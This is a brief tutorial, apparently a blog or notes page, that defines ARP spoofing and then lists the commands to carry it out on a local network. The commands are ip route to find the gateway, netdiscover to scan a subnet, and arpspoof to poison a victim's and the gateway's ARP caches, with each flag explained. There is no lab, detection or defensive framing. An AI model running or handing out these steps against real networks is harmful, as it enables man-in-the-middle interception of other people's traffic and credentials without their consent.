ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a legitimate computer or server on the network.

Check your default gateway:ip route
Scan your network:Netdiscover -r 192.168.1.0/24
-r is for range
Now start the ARP Poisoning/Spoofing:arpspoof -i eth0 -t victimIP -r DefaultGateway
-i is for interface.
-t is for target.
-r is for default gateway.
